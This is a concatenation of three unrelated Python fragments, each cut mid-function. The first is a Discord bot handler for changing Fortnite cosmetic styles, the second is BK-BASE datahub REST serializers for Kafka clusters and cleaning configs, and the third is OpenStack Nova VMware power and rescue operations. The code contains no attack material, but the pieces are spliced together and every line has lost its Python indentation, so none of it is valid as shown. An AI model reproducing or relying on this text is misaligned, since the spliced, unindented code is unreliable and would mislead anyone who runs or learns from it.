description = f'Usage: `style <skin / backpack / pickaxe>`',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
types = {
'outfit': 'AthenaCharacter',
'backpack': 'AthenaBackpack',
'pickaxe': 'AthenaPickaxe'
}
def check(msg):
return msg.author == message.author and msg.channel == message.channel
if cmd[0] == 'skin':
cosmetic = await self.cosmetics.get('outfit', id_=self.party.me.outfit)
if cosmetic['variants'] == None:
await message.channel.send(embed=discord.Embed(
description = 'This skin do not have styles',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
else:
if len(cosmetic['variants']) > 1:
categories = cosmetic['variants']
categories_str = ''
count = 0
for category in categories:
count += 1
categories_str += f'**{count}.** {category["type"]}\n'
msg = await message.channel.send(embed=discord.Embed(
title = 'Select type of variant',
description = f'{categories_str}',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
try:
m = await self.bot.wait_for('message', check=check, timeout=300)
if m.content not in string.digits:
return
try:
category = categories[int(m.content) - 1]
except Exception:
return
except asyncio.TimeoutError:
await msg.delete()
return
else:
category = cosmetic['variants'][0]
variant_options = category['options']
variant_channel = category['channel'].lower()
options_str = ''
count = 0
for option in variant_options:
count += 1
options_str += f'**{count}.** {option["name"]}\n'
msg = await message.channel.send(embed=discord.Embed(
title = 'Select style',
description = f'{options_str}',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
try:
m = await self.bot.wait_for('message', check=check, timeout=300)
if m.content not in string.digits:
return
try:
selected = variant_options[int(m.content) - 1]
user_selection_int = int(m.content)
except IndexError:
return
try:
variants = await get_variants(self, types['outfit'], variant_channel, user_selection_int, selected)
await self.party.me.edit_and_keep(partial(self.party.me.set_outfit, asset=cosmetic['id'], variants=variants))
except Exception as e:
await message.channel.send(embed=discord.Embed(
title = 'Error',
description = f'An uknown error ocurred:\n```py\n{traceback.format_exc()}```',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
await message.channel.send(embed=discord.Embed(
description = f'Skin style changed to **{selected["name"]}**',
color = 0x349eeb
).set_thumbnail(url=selected['image']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.outfit_variants': variants}})
return
except asyncio.TimeoutError:
await msg.delete()
if cmd[0] == 'backpack':
cosmetic = await self.cosmetics.get('backpack', id_=self.party.me.backpack)
if cosmetic['variants'] == None:
await message.channel.send(embed=discord.Embed(
description = 'This backpack do not have styles',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
else:
if len(cosmetic['variants']) > 1:
categories = cosmetic['variants']
categories_str = ''
count = 0
for category in categories:
count += 1
categories_str += f'**{count}.** {category["type"]}\n'
msg = await message.channel.send(embed=discord.Embed(
title = 'Select type of variant',
description = f'{categories_str}',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
try:
m = await self.bot.wait_for('message', check=check, timeout=300)
if m.content not in string.digits:
return
try:
category = categories[int(m.content) - 1]
except Exception:
return
except asyncio.TimeoutError:
await msg.delete()
return
else:
category = cosmetic['variants'][0]
variant_options = category['options']
variant_channel = category['channel'].lower()
options_str = ''
count = 0
for option in variant_options:
count += 1
options_str += f'**{count}.** {option["name"]}\n'
msg = await message.channel.send(embed=discord.Embed(
title = 'Select style',
description = f'{options_str}',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
try:
m = await self.bot.wait_for('message', check=check, timeout=300)
try:
selected = variant_options[int(m.content) - 1]
user_selection_int = int(m.content)
except IndexError:
return
try:
variants = await get_variants(self, types['backpack'], variant_channel, user_selection_int, selected)
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, asset=cosmetic['id'], variants=variants))
except Exception as e:
await message.channel.send(embed=discord.Embed(
title = 'Error',
description = f'An uknown error ocurred:\n```py\n{traceback.format_exc()}```',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
await message.channel.send(embed=discord.Embed(
description = f'Backpack style changed to **{selected["name"]}**',
color = 0x349eeb
).set_thumbnail(url=selected['image']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
| |
<reponame>Chromico/bk-base
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import, unicode_literals
import json
import re
import time
from common.exceptions import ValidationError
from datahub.access.collectors.factory import CollectorFactory
from datahub.common.const import CLEAN, DATA_TYPE, QUEUE, RAW_DATA, STORAGE_TYPE
from datahub.databus.common_helper import find_value_by_key
from datahub.databus.model_manager import get_raw_data_by_id
from datahub.databus.settings import PULLER_HDFSICEBERG_WORKERS
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from datahub.databus import exceptions, settings
class ClusterSerializer(serializers.Serializer):
"""
用于创建总线kafka connect集群的参数
"""
cluster_name = serializers.CharField(label=_("总线任务集群名称(命名规则:xxx-xxx-x)"), required=True)
cluster_type = serializers.ChoiceField(
default="kafka",
label=_("集群类型, kafka/pulsar"),
choices=(
(settings.TYPE_PULSAR, "pulsar"),
(settings.TYPE_KAFKA, "kafka"),
),
)
cluster_rest_domain = serializers.CharField(label=_("集群域名"), required=True)
cluster_rest_port = serializers.IntegerField(label=_("集群端口"), required=True)
cluster_bootstrap_servers = serializers.CharField(label="channel domain", required=False)
channel_name = serializers.CharField(label=_("channel名称"), required=True)
state = serializers.CharField(label=_("状态"), required=False, allow_null=True, allow_blank=True)
limit_per_day = serializers.IntegerField(label="集群处理能力上限", required=False, allow_null=True, min_value=0)
priority = serializers.IntegerField(label="优先级", required=False, allow_null=True, min_value=0)
description = serializers.CharField(label=_("描述"), required=False, allow_null=True, allow_blank=True)
tags = serializers.ListField(label=_("标签"), required=False)
module = serializers.CharField(label=_("module"), required=True)
component = serializers.CharField(label=_("component"), required=True)
def validata_cluster_type(self, value):
"""
校验cluster_type字段, 当前只支持kafka/pulsar
:param value:
"""
if value != settings.TYPE_PULSAR and value != settings.TYPE_KAFKA:
raise ValidationError()
class ClusterUpdateSerializer(serializers.Serializer):
"""
用于更新总线kafka connect集群参数
"""
cluster_name = serializers.CharField(label="集群名", required=False)
cluster_rest_domain = serializers.CharField(label="集群域名", required=False)
cluster_rest_port = serializers.IntegerField(label=_("集群端口"), required=False)
cluster_bootstrap_servers = serializers.CharField(label="集群kafka域名", required=False)
cluster_props = serializers.CharField(label=_("集群配置项,JSON格式"), required=False, allow_null=True, allow_blank=True)
channel_name = serializers.CharField(label=_("channel名称"), required=False)
consumer_props = serializers.CharField(label=_("消费者配置项,JSON格式"), required=False, allow_null=True, allow_blank=True)
consumer_bootstrap_servers = serializers.CharField(
label=_("消费kafka集群,JSON格式"), required=False, allow_null=True, allow_blank=True
)
monitor_props = serializers.CharField(label=_("监控配置项,JSON格式"), required=False, allow_null=True, allow_blank=True)
other_props = serializers.CharField(label=_("其他者配置项,JSON格式"), required=False, allow_null=True, allow_blank=True)
module = serializers.CharField(label=_("module"), required=False, allow_null=True, allow_blank=True)
component = serializers.CharField(label=_("component"), required=False, allow_null=True, allow_blank=True)
state = serializers.CharField(label=_("运行状态"), required=False, allow_null=True, allow_blank=True)
limit_per_day = serializers.IntegerField(label="集群处理能力上限", required=False, allow_null=True, min_value=1)
priority = serializers.IntegerField(label="优先级", required=False, allow_null=True, min_value=0)
# 校验几个props必须是json格式
def validate_cluster_props(self, value):
try:
json.loads(value)
return value
except Exception:
raise ValidationError()
def validate_consumer_props(self, value):
try:
json.loads(value)
return value
except Exception:
raise ValidationError()
def validate_monitor_props(self, value):
try:
json.loads(value)
return value
except Exception:
raise ValidationError()
def validate_other_props(self, value):
try:
json.loads(value)
return value
except Exception:
raise ValidationError()
class ClusterNameSerializer(serializers.Serializer):
cluster_name = serializers.CharField(label=_("总线任务集群名称"))
class ConnectorNameSerializer(serializers.Serializer):
connector = serializers.CharField(label=_("总线任务名称"))
class RtIdSerializer(serializers.Serializer):
rt_id = serializers.CharField(label=_("result_table_id"))
class ChannelSerializer(serializers.Serializer):
"""
用于创建总线队列集群的参数
"""
cluster_name = serializers.CharField(label=_("总线队列集群名称"), required=True)
cluster_domain = serializers.CharField(label=_("集群域名"), required=True)
cluster_type = serializers.CharField(label=_("集群类型"), required=False, allow_null=True, allow_blank=True)
cluster_role = serializers.CharField(label=_("集群角色"), required=False, allow_null=True, allow_blank=True)
cluster_backup_ips = serializers.CharField(label=_("集群备用IP"), required=False, allow_null=True, allow_blank=True)
cluster_port = serializers.IntegerField(label=_("集群端口"), required=False, allow_null=True)
zk_domain = serializers.CharField(label=_("集群zk域名"), required=False, allow_blank=True)
zk_port = serializers.IntegerField(label=_("集群zk端口"), required=False, allow_null=True)
zk_root_path = serializers.CharField(label=_("集群zk根路径"), required=False, allow_null=True, allow_blank=True)
active = serializers.BooleanField(label=_("集群状态"), required=False)
priority = serializers.IntegerField(label=_("集群优先级"), required=False, allow_null=True)
attribute = serializers.CharField(label=_("集群属性"), required=False, allow_null=True, allow_blank=True)
description = serializers.CharField(label=_("集群描述"), required=False, allow_null=True, allow_blank=True)
tags = serializers.ListField(label=_("标签"), required=False)
storage_name = serializers.CharField(label=_("storekit对应集群名"), required=False, allow_null=True, default=None)
stream_to_id = serializers.IntegerField(
label=_("gse关联的stream_to_id"), required=False, allow_null=True, default=None
)
class ChannelTailSerializer(serializers.Serializer):
kafka = serializers.CharField(label=_("kafka集群地址"), required=True)
cluster_type = serializers.CharField(label=_("集群类型"), required=False, allow_null=True, allow_blank=True)
channel_name = serializers.CharField(label=_("集群名称"), required=False, allow_null=True, allow_blank=True)
topic = serializers.CharField(label=_("kafka topic"), required=True)
type = serializers.CharField(label=_("kafka消息类型"), required=False)
partition = serializers.IntegerField(label=_("kafka分区"), required=False)
limit = serializers.IntegerField(label=_("显示数据记录条数"), required=False)
class ChannelMessageSerializer(serializers.Serializer):
kafka = serializers.CharField(label=_("kafka集群地址"), required=True)
topic = serializers.CharField(label=_("kafka topic"), required=True)
type = serializers.CharField(label=_("kafka消息类型"), required=False)
partition = serializers.IntegerField(label=_("kafka分区"), required=False)
offset = serializers.IntegerField(label=_("kafka消息offset"), required=False)
count = serializers.IntegerField(label=_("读取消息条数"), required=False)
class ChannelOffsetSerializer(serializers.Serializer):
kafka = serializers.CharField(label=_("kafka集群地址"), required=True)
topic = serializers.CharField(label=_("kafka topic"), required=True)
class HdfsImportSerializer(serializers.Serializer):
"""
用于创建离线hdfs导入kafka任务的参数
"""
result_table_id = serializers.CharField(label=_("result_table_id"), min_length=3, required=True)
data_dir = serializers.CharField(label=_("hdfs数据目录"), min_length=3, required=True)
description = serializers.CharField(label=_("描述信息"), allow_null=True, allow_blank=True, required=False)
class HdfsImportCleanSerializer(serializers.Serializer):
"""
用户离线hdfs导入kafka任务删除参数
"""
days = serializers.IntegerField(label=_("清除日期限定"), default=30, min_value=0)
class HdfsImportSearchSerializer(serializers.Serializer):
"""
用户离线hdfs导入kafka未完成任务列表获取
"""
limit = serializers.IntegerField(label=_("返回条目限定"), default=1000, min_value=1, max_value=10000)
geog_area = serializers.CharField(label=_("集群区域"), default="")
databus_type = serializers.CharField(label=_("databus类型(kafka/pulsar)"), default="kafka")
class HdfsImportCheckSerializer(serializers.Serializer):
"""
用户离线hdfs导入kafka任务运行状态检查
"""
interval_min = serializers.IntegerField(label=_("时间间隔"), default=5, min_value=1)
class HdfsImportUpdateSerializer(serializers.Serializer):
"""
用户离线hdfs导入kafka任务更新
"""
result_table_id = serializers.CharField(label=_("result_table_id"), min_length=1)
data_dir = serializers.CharField(label=_("hdfs数据目录"), min_length=1)
status = serializers.CharField(label=_("任务当前状态"), min_length=1)
finished = serializers.CharField(label=_("任务是否完成"), min_length=1)
class HdfsImportUpdateCompatibleSerializer(serializers.Serializer):
"""
用户离线hdfs导入kafka任务更新(兼容老接口)
"""
id = serializers.IntegerField(label=_("id"))
rt_id = serializers.CharField(label=_("result_table_id"), min_length=1)
data_dir = serializers.CharField(label=_("hdfs数据目录"), min_length=1)
status_update = serializers.CharField(label=_("任务当前状态"), min_length=1)
finish = serializers.CharField(label=_("任务是否完成"), min_length=1)
class StorageEventSerializer(serializers.Serializer):
"""
用于创建总线存储事件
"""
result_table_id = serializers.CharField(label=_("result_table_id"), required=True)
storage = serializers.CharField(label=_("存储类型"), required=True)
event_type = serializers.CharField(label=_("事件类型"), required=True)
event_value = serializers.CharField(label=_("事件值"), required=True)
description = serializers.CharField(label=_("事件描述"), allow_null=True, allow_blank=True, required=False)
class JobNotifySerializer(serializers.Serializer):
"""
用于触发离线计算
"""
result_table_id = serializers.CharField(label=_("result_table_id"), required=True)
date_time = serializers.CharField(label=_("数据时间"), required=True)
class CleanSerializer(serializers.Serializer):
"""
用于创建清洗配置的参数
{
"bk_biz_id": 122,
"clean_config_name": "test_clean_config_xxx",
"result_table_name": "test_etl",
"result_table_name_alias": "清洗表01",
"bk_username": 'admin',
"raw_data_id": 5,
"json_config": "{\"iterator\": \"\"}"
"fields": [{
"field_name": "a",
"field_alias": "字段1",
"field_type": "string",
"is_dimension": False,
"field_index": 1
}, {
"field_name": "ts",
"field_alias": "时间字段",
"field_type": "string",
"is_dimension": False,
"field_index": 2
}
}
"""
class ResultTableFieldSerializer(serializers.Serializer):
field_name = serializers.CharField(label=_("字段名称"))
field_alias = serializers.CharField(label=_("字段显示名称"))
field_type = serializers.CharField(label=_("字段类型"))
is_dimension = serializers.BooleanField(label=_("是否维度字段"))
field_index = serializers.IntegerField(label=_("字段序号"))
raise_meta_exception = serializers.BooleanField(label=_("是否抛出meta的异常"), required=False)
def validate_field_name(self, value):
pattern_1 = re.compile(r"^minute(\d)+")
pattern_2 = re.compile(r"^\$f\d+$")
pattern_3 = re.compile(r"^[a-zA-Z_][a-zA-Z0-9_]*$")
value_to_validate = value.lower()
if value_to_validate in (
"__time",
"dteventtimestamp",
"dteventtime",
"localtime",
"thedate",
"now",
):
raise ValidationError(message=_("系统保留字段,不允许使用。field:{}").format(value))
if pattern_1.match(value):
raise ValidationError(message=_("系统保留字段,不允许使用。field:{}").format(value))
if not pattern_3.match(value) and not pattern_2.match(value):
raise ValidationError(_("字段不合规。field:{}").format(value))
return value
json_config = serializers.CharField(label=_("清洗算子配置"))
bk_biz_id = serializers.IntegerField(label=_("业务ID"))
clean_config_name = serializers.CharField(label=_("清洗配置名称"), required=False)
result_table_name = serializers.CharField(label=_("表名"))
result_table_name_alias = serializers.CharField(label=_("表名别名"))
bk_username = serializers.CharField(label=_("用户名"))
raw_data_id = serializers.IntegerField(label=_("数据源ID"))
description = serializers.CharField(label=_("描述信息"))
fields = ResultTableFieldSerializer(required=True, many=True, label=_("清洗字段列表"))
def validate_json_config(self, value):
"""校验json_conf参数是否为合法的Json字符串"""
try:
a = json.loads(value)
if (
"extract" in a.keys()
and "conf" in a.keys()
and "time_field_name" in a["conf"].keys()
and "output_field_name" in a["conf"].keys()
and "time_format" in a["conf"].keys()
):
return value
else:
raise exceptions.CleanConfigError()
except Exception:
raise exceptions.CleanConfigError()
class CleanVerifySerializer(serializers.Serializer):
"""
用于验证清洗配置的参数
"""
conf = serializers.CharField(label=_("清洗算子配置"), required=True)
msg = serializers.CharField(label=_("待清洗的数据"), required=True)
debug_by_step = serializers.BooleanField(label=_("单步调试"), required=False)
def validate(self, attrs):
conf = attrs["conf"]
json_conf = json.loads(conf)
result_list = []
result_list = find_value_by_key(json_conf, "assign_to", result_list)
pattern_1 = re.compile(r"^minute(\d)+")
pattern_2 = re.compile(r"^\$f\d+$")
pattern_3 = re.compile(r"^[a-zA-Z_][a-zA-Z0-9_]*$")
if result_list:
for fileds in result_list:
value = fileds.get("assign_to", "")
value_to_validate = value.lower()
if value_to_validate in (
"__time",
"dteventtimestamp",
"dteventtime",
"localtime",
"thedate",
"now",
"offset",
):
raise ValidationError(message=_("系统保留字段,不允许使用。field:{}").format(value))
if pattern_1.match(value):
raise ValidationError(message=_("系统保留字段,不允许使用。field:{}").format(value))
if not pattern_3.match(value) and not pattern_2.match(value):
raise ValidationError(_("字段不合规。field:{}").format(value))
return attrs
class DeleteCleanSerializer(serializers.Serializer):
"""
清洗删除参数验证
"""
delete_metrics = serializers.ListField(label=_("删除指标列表"), default=[])
data_quality = serializers.BooleanField(label=_("是否删除数据质量"), default=False)
def validate(self, attrs):
attrs["data_quality"] = False
for attr in attrs["delete_metrics"]:
if attr == "dataquality":
attrs["data_quality"] = True
break
return attrs
class CleanDataIdVerifySerializer(serializers.Serializer):
"""
用于验证清洗配置的参数
"""
raw_data_id = serializers.IntegerField(label=_("数据源ID"), required=False)
class SetPartitionsSerializer(serializers.Serializer):
"""
用于验证设置rt的topic的分区数量的参数
"""
partitions = serializers.IntegerField(label=_("分区数量"))
def validate_partitions(self, value):
if value <= 1 or value > 50:
raise ValidationError()
return value
class SetTopicSerializer(serializers.Serializer):
"""
用于验证设置rt的topic的分区数量的参数
"""
retention_size_g = serializers.IntegerField(label=_("数据删除大小阈值"), required=True)
retention_hours = serializers.IntegerField(label=_("数据删除时间阈值"), required=True)
class AddQueueUserSerializer(serializers.Serializer):
user = serializers.CharField(label=_("访问队列服务的用户(app_code)"))
password = serializers.CharField(label=_("访问队列服务的密码(app_secret)"))
class QueueAuthSerializer(serializers.Serializer):
result_table_ids = serializers.ListField(label=_("ResultTable列表"))
user = serializers.CharField(label=_("队列服务的用户名称"))
class TasksCreateSerializer(serializers.Serializer):
result_table_id = serializers.CharField(label=_("result_table_id"), min_length=3, required=True)
storages = serializers.ListField(label=_("存储列表"), required=False)
class TasksRtIdSerializer(serializers.Serializer):
result_table_id = serializers.CharField(label=_("result_table_id"), min_length=3, required=True)
class TasksDataIdSerializer(serializers.Serializer):
data_id = serializers.IntegerField(label=_("数据源ID"), required=True)
class TasksTransportSerializer(serializers.Serializer):
source_rt_id = serializers.CharField(label=_("数据源"), required=True)
source_type = serializers.CharField(label=_("数据源"), required=True)
sink_rt_id = serializers.CharField(label=_("数据源"), required=True)
sink_type = serializers.CharField(label=_("数据源"), required=True)
parallelism = serializers.IntegerField(label=_("并行度"), default=10, required=False)
class TasksTransportStatusSerializer(serializers.Serializer):
for_datalab = serializers.BooleanField(label=_("是否用于datalab"), required=False, default=True)
class TasksConnectorsSerializer(serializers.Serializer):
connectors = serializers.CharField(label=_("connector名称列表"), required=False)
class TasksStoragesSerializer(serializers.Serializer):
storages = serializers.ListField(label=_("存储列表"), required=False)
class TasksStorageSerializer(serializers.Serializer):
storage = serializers.CharField(label=_("存储列表"), default="", required=False)
class TasksStateSerializer(serializers.Serializer):
result_table_id = serializers.CharField(label=_("result_table_id"), min_length=3, required=True)
slot = serializers.CharField(label=_("slot"), required=True)
class TasksDestClusterSerializer(serializers.Serializer):
dest_cluster = serializers.CharField(label=_("目标集群名称"), required=False)
class DataNodeCreateSerializer(serializers.Serializer):
"""
用于创建固化节点配置
"""
source_result_table_ids = serializers.CharField(label=_("来源结果表列表"), required=True)
node_type = serializers.CharField(label=_("节点类型"), required=True)
project_id = serializers.IntegerField(label=_("project_id"))
bk_biz_id = serializers.IntegerField(label=_("bk_biz_id"))
result_table_name = serializers.CharField(label=_("结果表英文名"))
result_table_name_alias = serializers.CharField(label=_("结果表中文名"))
config = serializers.CharField(label=_("固化算子逻辑配置"), allow_blank=True, allow_null=True, required=False)
description = serializers.CharField(label=_("备注"), allow_blank=True, allow_null=True, required=False)
class DataNodeDestroySerializer(serializers.Serializer):
"""
用于删除固化节点配置
"""
with_data = serializers.BooleanField(label=_("是否删除下游的结果表"), required=False)
delete_result_tables = serializers.ListField(label=_("删除下游的结果表列表"), required=False)
class DataNodeUpdateSerializer(serializers.Serializer):
"""用于更新固化节点配置"""
source_result_table_ids = serializers.CharField(label=_("来源结果表列表"), required=True)
node_type = serializers.CharField(label=_("节点类型"), required=True)
project_id = serializers.IntegerField(label=_("project_id"))
bk_biz_id = serializers.IntegerField(label=_("bk_biz_id"))
result_table_name = serializers.CharField(label=_("结果表英文名"))
result_table_name_alias = serializers.CharField(label=_("结果表中文名"))
config = serializers.CharField(label=_("固化算子逻辑配置"), allow_blank=True, allow_null=True, required=False)
description = serializers.CharField(label=_("备注"), allow_blank=True, allow_null=True, required=False)
delete_result_tables = | |
raise exception.InstanceSuspendFailure(reason=reason)
else:
LOG.debug("VM was already in suspended state. So returning "
"without doing anything", instance=instance)
def resume(self, instance):
"""Resume the specified instance."""
vm_ref = vm_util.get_vm_ref(self._session, instance)
pwr_state = self._session._call_method(vutil,
"get_object_property",
vm_ref,
"runtime.powerState")
if pwr_state.lower() == "suspended":
LOG.debug("Resuming the VM", instance=instance)
suspend_task = self._session._call_method(
self._session.vim,
"PowerOnVM_Task", vm_ref)
self._session._wait_for_task(suspend_task)
LOG.debug("Resumed the VM", instance=instance)
else:
reason = _("instance is not in a suspended state")
raise exception.InstanceResumeFailure(reason=reason)
def _get_rescue_device(self, instance, vm_ref):
hardware_devices = vm_util.get_hardware_devices(self._session, vm_ref)
return vm_util.find_rescue_device(hardware_devices,
instance)
def rescue(self, context, instance, network_info, image_meta):
"""Rescue the specified instance.
Attach the image that the instance was created from and boot from it.
"""
vm_ref = vm_util.get_vm_ref(self._session, instance)
# Get the root disk vmdk object
vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
uuid=instance.uuid)
ds_ref = vmdk.device.backing.datastore
datastore = ds_obj.get_datastore_by_ref(self._session, ds_ref)
dc_info = self.get_datacenter_ref_and_name(datastore.ref)
# Get the image details of the instance
image_info = images.VMwareImage.from_image(context,
image_meta.id,
image_meta)
vi = VirtualMachineInstanceConfigInfo(instance,
image_info,
datastore,
dc_info,
self._imagecache)
vm_util.power_off_instance(self._session, instance, vm_ref)
# Fetch the image if it does not exist in the cache
self._fetch_image_if_missing(context, vi)
# Get the rescue disk path
vm_folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
rescue_disk_path = datastore.build_path(vm_folder,
"%s-rescue.%s" % (image_info.image_id, image_info.file_type))
# Copy the cached image to the be the rescue disk. This will be used
# as the rescue disk for the instance.
ds_util.disk_copy(self._session, dc_info.ref,
vi.cache_image_path, rescue_disk_path)
# Attach the rescue disk to the instance
self._volumeops.attach_disk_to_vm(vm_ref, instance, vmdk.adapter_type,
vmdk.disk_type, rescue_disk_path)
# Get the rescue device and configure the boot order to
# boot from this device
rescue_device = self._get_rescue_device(instance, vm_ref)
factory = self._session.vim.client.factory
boot_spec = vm_util.get_vm_boot_spec(factory, rescue_device)
# Update the VM with the new boot order and power on
vm_util.reconfigure_vm(self._session, vm_ref, boot_spec)
vm_util.power_on_instance(self._session, instance, vm_ref=vm_ref)
def unrescue(self, instance, power_on=True):
"""Unrescue the specified instance."""
vm_ref = vm_util.get_vm_ref(self._session, instance)
# Get the rescue device and detach it from the instance.
try:
rescue_device = self._get_rescue_device(instance, vm_ref)
except exception.NotFound:
with excutils.save_and_reraise_exception():
LOG.error('Unable to access the rescue disk',
instance=instance)
vm_util.power_off_instance(self._session, instance, vm_ref)
self._volumeops.detach_disk_from_vm(vm_ref, instance, rescue_device,
destroy_disk=True)
if power_on:
vm_util.power_on_instance(self._session, instance, vm_ref=vm_ref)
def power_off(self, instance, timeout=0, retry_interval=0):
"""Power off the specified instance.
:param instance: nova.objects.instance.Instance
:param timeout: How long to wait in seconds for the instance to
shutdown
:param retry_interval: Interval to check if instance is already
shutdown in seconds.
"""
if timeout and self._clean_shutdown(instance,
timeout,
retry_interval):
return
vm_util.power_off_instance(self._session, instance)
self.update_cached_instances()
def _clean_shutdown(self, instance, timeout, retry_interval):
"""Perform a soft shutdown on the VM.
:param instance: nova.objects.instance.Instance
:param timeout: How long to wait in seconds for the instance to
shutdown
:param retry_interval: Interval to check if instance is already
shutdown in seconds.
:return: True if the instance was shutdown within time limit,
False otherwise.
"""
LOG.debug("Performing Soft shutdown on instance",
instance=instance)
vm_ref = vm_util.get_vm_ref(self._session, instance)
props = self._get_instance_props(vm_ref)
if props.get("runtime.powerState") != "poweredOn":
LOG.debug("Instance not in poweredOn state.",
instance=instance)
return False
if ((props.get("summary.guest.toolsStatus") == "toolsOk") and
(props.get("summary.guest.toolsRunningStatus") ==
"guestToolsRunning")):
LOG.debug("Soft shutdown instance, timeout: %d",
timeout, instance=instance)
self._session._call_method(self._session.vim,
"ShutdownGuest",
vm_ref)
while timeout > 0:
wait_time = min(retry_interval, timeout)
props = self._get_instance_props(vm_ref)
if props.get("runtime.powerState") == "poweredOff":
LOG.info("Soft shutdown succeeded.",
instance=instance)
return True
time.sleep(wait_time)
timeout -= retry_interval
LOG.warning("Timed out while waiting for soft shutdown.",
instance=instance)
else:
LOG.debug("VMware Tools not running", instance=instance)
return False
def is_instance_in_resource_pool(self, instance):
try:
vm_ref = vm_util.get_vm_ref(self._session, instance)
res_pool = self._session._call_method(vutil, "get_object_property",
vm_ref, "resourcePool")
return vutil.get_moref_value(res_pool) == \
vutil.get_moref_value(self._root_resource_pool)
except (exception.InstanceNotFound,
vexc.ManagedObjectNotFoundException):
LOG.debug("Failed to find instance", instance=instance)
return False
def _get_instance_props(self, vm_ref):
lst_properties = ["config.instanceUuid",
"runtime.powerState",
"summary.guest.toolsStatus",
"summary.guest.toolsRunningStatus",
]
self.update_cached_instances()
vm_props = vm_util._VM_VALUE_CACHE.get(vm_ref.value, {})
if set(vm_props.keys()).issuperset(lst_properties):
return vm_props
else:
return self._session._call_method(
vutil, "get_object_properties_dict",
vm_ref, lst_properties)
def power_on(self, instance):
vm_util.power_on_instance(self._session, instance)
self.update_cached_instances()
def _update_instance_progress(self, context, instance, step, total_steps):
"""Update instance progress percent to reflect current step number
"""
# Divide the action's workflow into discrete steps and "bump" the
# instance's progress field as each step is completed.
#
# For a first cut this should be fine, however, for large VM images,
# the clone disk step begins to dominate the equation. A
# better approximation would use the percentage of the VM image that
# has been streamed to the destination host.
progress = round(float(step) / total_steps * 100)
instance_uuid = instance.uuid
LOG.debug("Updating instance '%(instance_uuid)s' progress to"
" %(progress)d",
{'instance_uuid': instance_uuid, 'progress': progress},
instance=instance)
instance.progress = progress
instance.save()
def _resize_vm(self, context, instance, vm_ref, flavor, image_meta):
"""Resizes the VM according to the flavor."""
client_factory = self._session.vim.client.factory
extra_specs = self._get_extra_specs(flavor, image_meta)
metadata = self._get_instance_metadata(context, instance, flavor)
vm_resize_spec = vm_util.get_vm_resize_spec(client_factory,
int(flavor.vcpus),
int(flavor.memory_mb),
extra_specs,
metadata=metadata)
vm_util.reconfigure_vm(self._session, vm_ref, vm_resize_spec)
old_flavor = instance.old_flavor
old_needs_override = utils.is_big_vm(int(old_flavor.memory_mb),
old_flavor) \
or utils.is_large_vm(int(old_flavor.memory_mb),
old_flavor)
new_needs_override = utils.is_big_vm(int(flavor.memory_mb), flavor) \
or utils.is_large_vm(int(flavor.memory_mb),
flavor)
if not old_needs_override and new_needs_override:
# Make sure we don't automatically move around "big" VMs
behavior = constants.DRS_BEHAVIOR_PARTIALLY_AUTOMATED
LOG.debug("Adding DRS override '%s' for big VM.", behavior,
instance=instance)
cluster_util.update_cluster_drs_vm_override(self._session,
self._cluster,
vm_ref,
operation='add',
behavior=behavior)
elif old_needs_override and not new_needs_override:
# remove the old override, if we had one before. make sure we don't
# error out if it was already deleted another way
LOG.debug("Removing DRS override for former big VM.",
instance=instance)
try:
cluster_util.update_cluster_drs_vm_override(self._session,
self._cluster,
vm_ref,
operation='remove')
except Exception:
LOG.exception('Could not remove DRS override.',
instance=instance)
self._clean_up_after_special_spawning(context, flavor.memory_mb,
flavor)
def _resize_disk(self, instance, vm_ref, vmdk, flavor):
if (flavor.root_gb > instance.old_flavor.root_gb
and flavor.root_gb > vmdk.capacity_in_bytes / units.Gi):
root_disk_in_kb = flavor.root_gb * units.Mi
ds_ref = vmdk.device.backing.datastore
dc_info = self.get_datacenter_ref_and_name(ds_ref)
